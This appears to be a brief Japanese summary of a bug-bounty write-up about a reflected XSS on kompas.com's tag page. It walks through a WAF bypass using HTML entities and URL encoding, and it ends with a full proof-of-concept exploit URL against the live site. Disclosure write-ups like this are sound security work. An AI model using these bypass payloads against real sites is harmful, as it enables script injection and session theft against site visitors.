Hello there, ('ω')ノ

 

kompas.comサイトにおける反映型XSSとWAFバイパスを。

 

脆弱性：

 

記事：

　https://aidilarf.medium.com/xss-reflected-bypass-waf-di-situs-kompas-com-9968686326bc

 

今回は、Kompas.comサイトでのXSS REFLECTED BYPASS WAFについて。

XSSの脆弱性は、そのTAG機能に存在して。

 

     https://www.kompas.com/tag/test

 

使用されるペイロード：

     <a href=”javascript:prompt()”>クリック</a>

 

そこで上記のタグを入力するとWAFにヒットして。

Waf Kompas.com

 

そしてここでは、HTML ENTITIESを使用してWAFをバイパスしようとして。

また、「エラーが発生しました」という警告が表示されるため、

URL をエンコードする必要もあり。

「エラーが発生しました」という警告を回避するには、

URL エンコードする必要があるタグをいくつか示して。

 

    ( ; ) = %3b

    ( ‘ ) = %27

    ( & ) = %26

    ( = ) = %3D

 

最終ペイロードは HTML エンティティを使用して WAF をバイパスして。

 

<a href=”j&Tab;a&Tab;v&Tab:asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;”>Click</a>

 

HTML エンティティとエンコード URL を使用した最終ペイロード バイパス WAF:

    %3Ca%20href%3d%22j%26Tab%3ba%26Tab%3bv%26Tab%3basc%26NewLine%3bri%26Tab%3bpt%26colon%3b%26lpar%3bp%26Tab%3br%26Tab%3bo%26Tab%3bm%26Tab%3bp%26Tab%3bt%26Tab%3b%28document.domain%29%26rpar%3b%22%3ECLICK

 

最終的な URL：

    https://www.kompas.com/tag/maia+estianty%22%3E%3Ca%20href%3d%22j%26Tab%3ba%26Tab%3bv%26Tab%3basc%26NewLine%3bri%26Tab%3bpt%26colon%3b%26lpar%3bp%26Tab%3br%26Tab%3bo%26Tab%3bm%26Tab%3bp%26Tab%3bt%26Tab%3b%28document.domain%29%26rpar%3b%22%3ECLICK

 

 

Best regards, (^^ゞ